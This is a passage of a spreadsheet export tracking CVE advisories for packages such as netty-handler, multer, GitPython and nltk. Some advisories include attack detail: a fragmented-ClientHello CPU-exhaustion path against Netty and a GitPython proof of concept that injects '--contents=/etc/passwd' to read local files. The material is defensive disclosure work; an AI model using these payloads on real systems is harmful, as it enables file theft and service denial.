	// ... existing checks ...

	// IPv6 transition mechanisms embedding arbitrary IPv4
	if len(ip) == net.IPv6len {
		if ip[0] == 0x20 &amp;&amp; ip[1] == 0x02 { return true } // 6to4
		if ip[0] == 0x00 &amp;&amp; ip[1] == 0x64 &amp;&amp; ip[2] == 0xff &amp;&amp; ip[3] == 0x9b { return true } // NAT64
		if ip[0] == 0x20 &amp;&amp; ip[1] == 0x01 &amp;&amp; ip[2] == 0x00 &amp;&amp; ip[3] == 0x00 { return true } // Teredo
	}
	return false
}
```

## Credit

Reported by tonghuaroot (tonghuaroot@gmail.com).</t></is></c><c r="T1588" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73087</t></is></c></row><row r="1589"><c r="A1589" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1589" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1589" s="5" t="inlineStr"><is><t>CVE-2026-73262</t></is></c><c r="D1589" s="5" t="inlineStr" /><c r="E1589" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1589" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1589" s="5" t="inlineStr" /><c r="H1589" s="5" t="n"><v>0.002</v></c><c r="I1589" s="5" t="inlineStr" /><c r="J1589" s="5" t="inlineStr" /><c r="K1589" s="5" t="inlineStr" /><c r="L1589" s="5" t="inlineStr"><is><t>PyPI:prowler, PyPI:prowler-cloud</t></is></c><c r="M1589" s="5" t="inlineStr"><is><t>5.37.0</t></is></c><c r="N1589" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1589" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1589" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1589" s="5" t="inlineStr" /><c r="R1589" s="5" t="inlineStr" /><c r="S1589" s="5" t="inlineStr"><is><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is></c><c r="T1589" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73262</t></is></c></row><row r="1590"><c r="A1590" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1590" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1590" s="5" t="inlineStr"><is><t>CVE-2026-73294</t></is></c><c r="D1590" s="5" t="inlineStr" /><c r="E1590" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F1590" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1590" s="5" t="inlineStr" /><c r="H1590" s="5" t="n"><v>0.006</v></c><c r="I1590" s="5" t="inlineStr" /><c r="J1590" s="5" t="inlineStr" /><c r="K1590" s="5" t="inlineStr" /><c r="L1590" s="5" t="inlineStr"><is><t>Go:github.com/semaphoreui/semaphore</t></is></c><c r="M1590" s="5" t="inlineStr"><is><t>0.0.0-20260704181911-7e8a9434bd81</t></is></c><c r="N1590" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1590" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1590" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1590" s="5" t="inlineStr" /><c r="R1590" s="5" t="inlineStr" /><c r="S1590" s="5" t="inlineStr"><is><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is></c><c r="T1590" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73294</t></is></c></row><row r="1591"><c r="A1591" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1591" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1591" s="5" t="inlineStr"><is><t>CVE-2026-73558</t></is></c><c r="D1591" s="5" t="inlineStr" /><c r="E1591" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1591" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1591" s="5" t="inlineStr" /><c r="H1591" s="5" t="n"><v>0.003</v></c><c r="I1591" s="5" t="inlineStr" /><c r="J1591" s="5" t="inlineStr" /><c r="K1591" s="5" t="inlineStr" /><c r="L1591" s="5" t="inlineStr"><is><t>PyPI:vllm</t></is></c><c r="M1591" s="5" t="inlineStr"><is><t>0.27.0</t></is></c><c r="N1591" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1591" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1591" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1591" s="5" t="inlineStr" /><c r="R1591" s="5" t="inlineStr" /><c r="S1591" s="5" t="inlineStr"><is><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is></c><c r="T1591" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73558</t></is></c></row><row r="1592"><c r="A1592" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1592" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1592" s="5" t="inlineStr"><is><t>CVE-2026-73560</t></is></c><c r="D1592" s="5" t="inlineStr" /><c r="E1592" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1592" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1592" s="5" t="inlineStr" /><c r="H1592" s="5" t="n"><v>0.003</v></c><c r="I1592" s="5" t="inlineStr" /><c r="J1592" s="5" t="inlineStr" /><c r="K1592" s="5" t="inlineStr" /><c r="L1592" s="5" t="inlineStr"><is><t>PyPI:vllm</t></is></c><c r="M1592" s="5" t="inlineStr"><is><t>0.26.0</t></is></c><c r="N1592" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1592" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1592" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1592" s="5" t="inlineStr" /><c r="R1592" s="5" t="inlineStr" /><c r="S1592" s="5" t="inlineStr"><is><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is></c><c r="T1592" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73560</t></is></c></row><row r="1593"><c r="A1593" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1593" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1593" s="5" t="inlineStr"><is><t>CVE-2026-75595</t></is></c><c r="D1593" s="5" t="inlineStr" /><c r="E1593" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F1593" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1593" s="5" t="inlineStr" /><c r="H1593" s="5" t="n"><v>0.003</v></c><c r="I1593" s="5" t="inlineStr" /><c r="J1593" s="5" t="inlineStr" /><c r="K1593" s="5" t="inlineStr" /><c r="L1593" s="5" t="inlineStr"><is><t>Maven:io.netty:netty-handler</t></is></c><c r="M1593" s="5" t="inlineStr"><is><t>4.1.137.Final, 4.2.17.Final</t></is></c><c r="N1593" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1593" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1593" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1593" s="5" t="inlineStr" /><c r="R1593" s="5" t="inlineStr" /><c r="S1593" s="5" t="inlineStr"><is><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is></c><c r="T1593" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75595</t></is></c></row><row r="1594"><c r="A1594" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1594" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1594" s="5" t="inlineStr"><is><t>CVE-2026-75596</t></is></c><c r="D1594" s="5" t="inlineStr" /><c r="E1594" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1594" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1594" s="5" t="inlineStr" /><c r="H1594" s="5" t="n"><v>0.004</v></c><c r="I1594" s="5" t="inlineStr" /><c r="J1594" s="5" t="inlineStr" /><c r="K1594" s="5" t="inlineStr" /><c r="L1594" s="5" t="inlineStr"><is><t>Maven:io.netty:netty-handler</t></is></c><c r="M1594" s="5" t="inlineStr"><is><t>4.1.137.Final, 4.2.17.Final</t></is></c><c r="N1594" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1594" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1594" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1594" s="5" t="inlineStr" /><c r="R1594" s="5" t="inlineStr" /><c r="S1594" s="5" t="inlineStr"><is><t>### Summary

Netty's default SNI entrypoint reparses and recopies previously received ClientHello fragments on every additional TLS handshake record. A remote peer can send a small first record that advertises a large ClientHello length and then drip the body in many tiny records, causing **superlinear (quadratic) CPU work** before the handshake completes. With 4095 one-byte fragments, the handler recopies **8,386,560 bytes** from only **24,579 bytes** on the wire — a **341× amplification** ratio.

### Affected Entrypoints

- `io.netty.handler.ssl.SniHandler` — default constructors
- `io.netty.handler.ssl.SslClientHelloHandler` — pre-handshake ClientHello aggregation path

### Vulnerable Code Locations

- `handler/src/main/java/io/netty/handler/ssl/SniHandler.java:85`
- `handler/src/main/java/io/netty/handler/ssl/SslClientHelloHandler.java:75` (decode entry)
- `handler/src/main/java/io/netty/handler/ssl/SslClientHelloHandler.java:165` (handshakeBuffer.clear)
- `handler/src/main/java/io/netty/handler/ssl/SslClientHelloHandler.java:174` (writeBytes re-copy)
- `codec-base/src/main/java/io/netty/handler/codec/ByteToMessageDecoder.java:294` (cumulation retention)

### Exploit Path

```
1. TCP connection → SniHandler → SslClientHelloHandler.decode
2. First record: TLS handshake header declaring large ClientHello length (e.g., 4096 bytes)
3. Attacker sends thousands of tiny follow-on handshake records (1 byte each)
4. On each fragment: handshakeBuffer.clear() + writeBytes() re-copies ALL accumulated body bytes
5. Total bytes copied = n*(n+1)/2 where n = number of body bytes → quadratic
6. Event-loop CPU exhausted before SslHandler takes over
```

### Impact

- **Vulnerability Type:** Inefficient Algorithmic Complexity
- An unauthenticated network attacker can drive disproportionate CPU consumption on the Netty event loop
- Affects **all** Netty deployments using `SniHandler` for TLS termination (the default SNI path)
- No privileges, user interaction, or special configuration required
- Can degrade or stall TLS connection handling for all clients on the affected event loop
- The attack requires only modest bandwidth (~25 KB) to trigger significant CPU work

---
### Credits

Found by a security research team from the University of Sydney, focusing on detecting open source software vulnerabilities.
Liyi Zhou: https://lzhou1110.github.io/
Ziyue Wang: https://zyy0530.github.io/
Strick: https://str1ckl4nd.github.io/
Maurice: https://maurice.busystar.org/
Chenchen Yu: https://7thparkk.github.io/</t></is></c><c r="T1594" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75596</t></is></c></row><row r="1595"><c r="A1595" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1595" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1595" s="5" t="inlineStr"><is><t>CVE-2026-75604</t></is></c><c r="D1595" s="5" t="inlineStr" /><c r="E1595" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F1595" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1595" s="5" t="inlineStr" /><c r="H1595" s="5" t="n"><v>0.025</v></c><c r="I1595" s="5" t="inlineStr" /><c r="J1595" s="5" t="inlineStr" /><c r="K1595" s="5" t="inlineStr" /><c r="L1595" s="5" t="inlineStr"><is><t>npm:next</t></is></c><c r="M1595" s="5" t="inlineStr"><is><t>15.5.24, 16.3.3</t></is></c><c r="N1595" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1595" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1595" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1595" s="5" t="inlineStr" /><c r="R1595" s="5" t="inlineStr" /><c r="S1595" s="5" t="inlineStr"><is><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is></c><c r="T1595" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75604</t></is></c></row><row r="1596"><c r="A1596" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1596" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1596" s="5" t="inlineStr"><is><t>CVE-2026-77037</t></is></c><c r="D1596" s="5" t="inlineStr" /><c r="E1596" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1596" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1596" s="5" t="inlineStr" /><c r="H1596" s="5" t="n"><v>0.003</v></c><c r="I1596" s="5" t="inlineStr" /><c r="J1596" s="5" t="inlineStr" /><c r="K1596" s="5" t="inlineStr" /><c r="L1596" s="5" t="inlineStr"><is><t>npm:multer</t></is></c><c r="M1596" s="5" t="inlineStr"><is><t>2.3.0</t></is></c><c r="N1596" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1596" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1596" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1596" s="5" t="inlineStr" /><c r="R1596" s="5" t="inlineStr" /><c r="S1596" s="5" t="inlineStr"><is><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is></c><c r="T1596" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77037</t></is></c></row><row r="1597"><c r="A1597" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1597" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1597" s="5" t="inlineStr"><is><t>CVE-2026-77063</t></is></c><c r="D1597" s="5" t="inlineStr" /><c r="E1597" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1597" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1597" s="5" t="inlineStr" /><c r="H1597" s="5" t="n"><v>0.002</v></c><c r="I1597" s="5" t="inlineStr" /><c r="J1597" s="5" t="inlineStr" /><c r="K1597" s="5" t="inlineStr" /><c r="L1597" s="5" t="inlineStr"><is><t>npm:multer</t></is></c><c r="M1597" s="5" t="inlineStr"><is><t>2.3.0</t></is></c><c r="N1597" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1597" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1597" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1597" s="5" t="inlineStr" /><c r="R1597" s="5" t="inlineStr" /><c r="S1597" s="5" t="inlineStr"><is><t>### Impact

When `multer` is configured with an asynchronous `fileFilter`, the `limits.fileSize` limit can be bypassed. The `'limit'` event is registered inside the async `fileFilter` callback, so if a file exceeds `limits.fileSize` before that callback runs, the event is missed and the oversized upload is accepted instead of being rejected with a `LIMIT_FILE_SIZE` error. Applications that rely on `limits.fileSize` to reject oversized uploads are affected on all upload methods (`.single()`, `.array()`, `.fields()`, `.any()`). Uploads using a synchronous `fileFilter` are not affected.

### Patches

Users should upgrade to `2.3.0`.

### Workarounds

Use a synchronous `fileFilter`, or validate the uploaded file size after the upload completes.</t></is></c><c r="T1597" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77063</t></is></c></row><row r="1598"><c r="A1598" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1598" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1598" s="5" t="inlineStr"><is><t>CVE-2026-77078</t></is></c><c r="D1598" s="5" t="inlineStr" /><c r="E1598" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1598" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1598" s="5" t="inlineStr" /><c r="H1598" s="5" t="n"><v>0.003</v></c><c r="I1598" s="5" t="inlineStr" /><c r="J1598" s="5" t="inlineStr" /><c r="K1598" s="5" t="inlineStr" /><c r="L1598" s="5" t="inlineStr"><is><t>npm:multer</t></is></c><c r="M1598" s="5" t="inlineStr"><is><t>2.3.0</t></is></c><c r="N1598" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1598" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1598" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1598" s="5" t="inlineStr" /><c r="R1598" s="5" t="inlineStr" /><c r="S1598" s="5" t="inlineStr"><is><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is></c><c r="T1598" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77078</t></is></c></row><row r="1599"><c r="A1599" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1599" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1599" s="5" t="inlineStr"><is><t>CVE-2026-7809</t></is></c><c r="D1599" s="5" t="inlineStr" /><c r="E1599" s="5" t="inlineStr" /><c r="F1599" s="5" t="inlineStr" /><c r="G1599" s="5" t="inlineStr" /><c r="H1599" s="5" t="inlineStr" /><c r="I1599" s="5" t="inlineStr" /><c r="J1599" s="5" t="inlineStr" /><c r="K1599" s="5" t="inlineStr" /><c r="L1599" s="5" t="inlineStr" /><c r="M1599" s="5" t="inlineStr" /><c r="N1599" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1599" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1599" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1599" s="5" t="inlineStr" /><c r="R1599" s="5" t="inlineStr" /><c r="S1599" s="5" t="inlineStr"><is><t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t></is></c><c r="T1599" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-7809</t></is></c></row><row r="1600"><c r="A1600" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1600" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1600" s="5" t="inlineStr"><is><t>CVE-2026-78675</t></is></c><c r="D1600" s="5" t="inlineStr" /><c r="E1600" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1600" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1600" s="5" t="inlineStr" /><c r="H1600" s="5" t="n"><v>0.001</v></c><c r="I1600" s="5" t="inlineStr" /><c r="J1600" s="5" t="inlineStr" /><c r="K1600" s="5" t="inlineStr" /><c r="L1600" s="5" t="inlineStr"><is><t>PyPI:gitpython</t></is></c><c r="M1600" s="5" t="inlineStr"><is><t>3.1.59</t></is></c><c r="N1600" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1600" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1600" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1600" s="5" t="inlineStr" /><c r="R1600" s="5" t="inlineStr" /><c r="S1600" s="5" t="inlineStr"><is><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is></c><c r="T1600" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78675</t></is></c></row><row r="1601"><c r="A1601" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1601" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1601" s="5" t="inlineStr"><is><t>CVE-2026-78676</t></is></c><c r="D1601" s="5" t="inlineStr" /><c r="E1601" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F1601" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1601" s="5" t="inlineStr" /><c r="H1601" s="5" t="n"><v>0.004</v></c><c r="I1601" s="5" t="inlineStr" /><c r="J1601" s="5" t="inlineStr" /><c r="K1601" s="5" t="inlineStr" /><c r="L1601" s="5" t="inlineStr"><is><t>PyPI:gitpython</t></is></c><c r="M1601" s="5" t="inlineStr"><is><t>3.1.59</t></is></c><c r="N1601" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1601" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1601" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1601" s="5" t="inlineStr" /><c r="R1601" s="5" t="inlineStr" /><c r="S1601" s="5" t="inlineStr"><is><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is></c><c r="T1601" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78676</t></is></c></row><row r="1602"><c r="A1602" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1602" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1602" s="5" t="inlineStr"><is><t>CVE-2026-78677</t></is></c><c r="D1602" s="5" t="inlineStr" /><c r="E1602" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1602" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1602" s="5" t="inlineStr" /><c r="H1602" s="5" t="n"><v>0.004</v></c><c r="I1602" s="5" t="inlineStr" /><c r="J1602" s="5" t="inlineStr" /><c r="K1602" s="5" t="inlineStr" /><c r="L1602" s="5" t="inlineStr"><is><t>PyPI:gitpython</t></is></c><c r="M1602" s="5" t="inlineStr"><is><t>3.1.59</t></is></c><c r="N1602" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1602" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1602" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1602" s="5" t="inlineStr" /><c r="R1602" s="5" t="inlineStr" /><c r="S1602" s="5" t="inlineStr"><is><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is></c><c r="T1602" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78677</t></is></c></row><row r="1603"><c r="A1603" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1603" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1603" s="5" t="inlineStr"><is><t>CVE-2026-78678</t></is></c><c r="D1603" s="5" t="inlineStr" /><c r="E1603" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1603" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1603" s="5" t="inlineStr" /><c r="H1603" s="5" t="n"><v>0.002</v></c><c r="I1603" s="5" t="inlineStr" /><c r="J1603" s="5" t="inlineStr" /><c r="K1603" s="5" t="inlineStr" /><c r="L1603" s="5" t="inlineStr"><is><t>PyPI:gitpython</t></is></c><c r="M1603" s="5" t="inlineStr"><is><t>3.1.59</t></is></c><c r="N1603" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1603" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1603" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1603" s="5" t="inlineStr" /><c r="R1603" s="5" t="inlineStr" /><c r="S1603" s="5" t="inlineStr"><is><t>## Summary
`Repo.blame()` / `Repo.blame_incremental()` guard forwarded revision options against `unsafe_git_revision_options`, but that denylist only contains the file-WRITE options `--output`/`-o`. `git blame` also honors `--contents &lt;file&gt;` and `-S &lt;file&gt;`, which cause the file's lines to be echoed into the blame result — an arbitrary file READ. Neither option is in the denylist, so a caller-influenced revision value of `--contents=&lt;path&gt;` passes the guard and leaks file contents. This is a distinct sink-option and impact class (READ) from GHSA-956x-8gvw-wg5v (which addressed the blame `--output` WRITE), directly analogous to GHSA-539m-9xh6-q6rr (archive READ gap accepted separately from the archive write/exec advisory).

## Root Cause
`unsafe_git_revision_options = ["--output","-o"]` (`git/repo/base.py:188`). The `rev` string is passed to `_option_candidates([rev], kwargs)` and placed BEFORE the `--` separator (base.py:841). The canonical name of `--contents=...` is `contents`, which is not on the denylist, so no `UnsafeOptionError` is raised. The trailing `--` protects only the pathspec, not the option before the revision.

## Impact
Arbitrary local file read at the privileges of the host process; the file's line contents appear in the blame result returned to the caller. Pure VALUE control (the caller forwards a user-influenced revision string). Default `allow_unsafe_options=False`.

## Proof of Concept
```python
result = repo.blame("--contents=/etc/passwd", "a.txt")
# result rows carry the victim file's line text
```

## Attack Chain
1. Entry: app calls `repo.blame(rev, file)` with attacker `rev="--contents=/etc/passwd"` (or kwarg `contents="/etc/passwd"`, or `-S`).
2. Check: `Git.check_unsafe_options(_option_candidates([rev,...], kwargs), unsafe_git_revision_options)` @ base.py:841. Guard: denylist = `["--output","-o"]` only. Bypass proof: canonical name `contents` ∉ denylist → no error.
3. Sink: `self.git.blame(rev, "--", file, p=True, ...)`. argv (observed): `['git','blame','-p','--contents=&lt;secret&gt;','HEAD','--','a.txt']`.
4. Impact: blame result rows carry the victim file's line text.

## Bypass Evidence
Independently reproduced (independent test harness, default `allow_unsafe_options=False`): `blame('--contents=&lt;secret&gt;','a.txt')` → guard PASSED; result rows = `['GATE_SECRET_LINE_A','GATE_SECRET_LINE_B']`. Control: `blame('--output=…')` still BLOCKED (guard active on this path). `-S` kwarg argv also reaches git unguarded.

## Affected Versions
`GitPython &lt;= 3.1.58` (denylist present verbatim on the latest release tag).

## Suggested Fix
Prefer an allowlist of blame options; at minimum add `--contents`/`-S` (and any other path-taking blame options) to `unsafe_git_revision_options`, and make the membership rule "the option takes a filesystem path" rather than "the option writes output".

---
Reported by **zx (Jace)** — GitHub: @manus-use</t></is></c><c r="T1603" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78678</t></is></c></row><row r="1604"><c r="A1604" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1604" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1604" s="5" t="inlineStr"><is><t>CVE-2026-78679</t></is></c><c r="D1604" s="5" t="inlineStr" /><c r="E1604" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1604" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1604" s="5" t="inlineStr" /><c r="H1604" s="5" t="n"><v>0.002</v></c><c r="I1604" s="5" t="inlineStr" /><c r="J1604" s="5" t="inlineStr" /><c r="K1604" s="5" t="inlineStr" /><c r="L1604" s="5" t="inlineStr"><is><t>PyPI:gitpython</t></is></c><c r="M1604" s="5" t="inlineStr"><is><t>3.1.59</t></is></c><c r="N1604" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1604" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1604" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1604" s="5" t="inlineStr" /><c r="R1604" s="5" t="inlineStr" /><c r="S1604" s="5" t="inlineStr"><is><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is></c><c r="T1604" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78679</t></is></c></row><row r="1605"><c r="A1605" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1605" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1605" s="5" t="inlineStr"><is><t>CVE-2026-78681</t></is></c><c r="D1605" s="5" t="inlineStr" /><c r="E1605" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1605" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1605" s="5" t="inlineStr" /><c r="H1605" s="5" t="n"><v>0.003</v></c><c r="I1605" s="5" t="inlineStr" /><c r="J1605" s="5" t="inlineStr" /><c r="K1605" s="5" t="inlineStr" /><c r="L1605" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M1605" s="5" t="inlineStr"><is><t>3.10.3</t></is></c><c r="N1605" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1605" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1605" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1605" s="5" t="inlineStr" /><c r="R1605" s="5" t="inlineStr" /><c r="S1605" s="5" t="inlineStr"><is><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is></c><c r="T1605" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78681</t></is></c></row><row r="1606"><c r="A1606" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1606" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1606" s="5" t="inlineStr"><is><t>CVE-2026-78682</t></is></c><c r="D1606" s="5" t="inlineStr" /><c r="E1606" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1606" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1606" s="5" t="inlineStr" /><c r="H1606" s="5" t="n"><v>0.003</v></c><c r="I1606" s="5" t="inlineStr" /><c r="J1606" s="5" t="inlineStr" /><c r="K1606" s="5" t="inlineStr" /><c r="L1606" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M1606" s="5" t="inlineStr"><is><t>3.10.3</t></is></c><c r="N1606" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1606" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1606" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1606" s="5" t="inlineStr" /><c r="R1606" s="5" t="inlineStr" /><c r="S1606" s="5" t="inlineStr"><is><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is></c><c r="T1606" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78682</t></is></c></row><row r="1607"><c r="A1607" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1607" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1607" s="5" t="inlineStr"><is><t>CVE-2026-78683</t></is></c><c r="D1607" s="5" t="inlineStr" /><c r="E1607" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F1607" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1607" s="5" t="inlineStr" /><c r="H1607" s="5" t="n"><v>0.003</v></c><c r="I1607" s="5" t="inlineStr" /><c r="J1607" s="5" t="inlineStr" /><c r="K1607" s="5" t="inlineStr" /><c r="L1607" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M1607" s="5" t="inlineStr"><is><t>3.10.0</t></is></c><c r="N1607" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1607" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1607" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1607" s="5" t="inlineStr" /><c r="R1607" s="5" t="inlineStr" /><c r="S1607" s="5" t="inlineStr"><is><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is></c><c r="T1607" s="6" 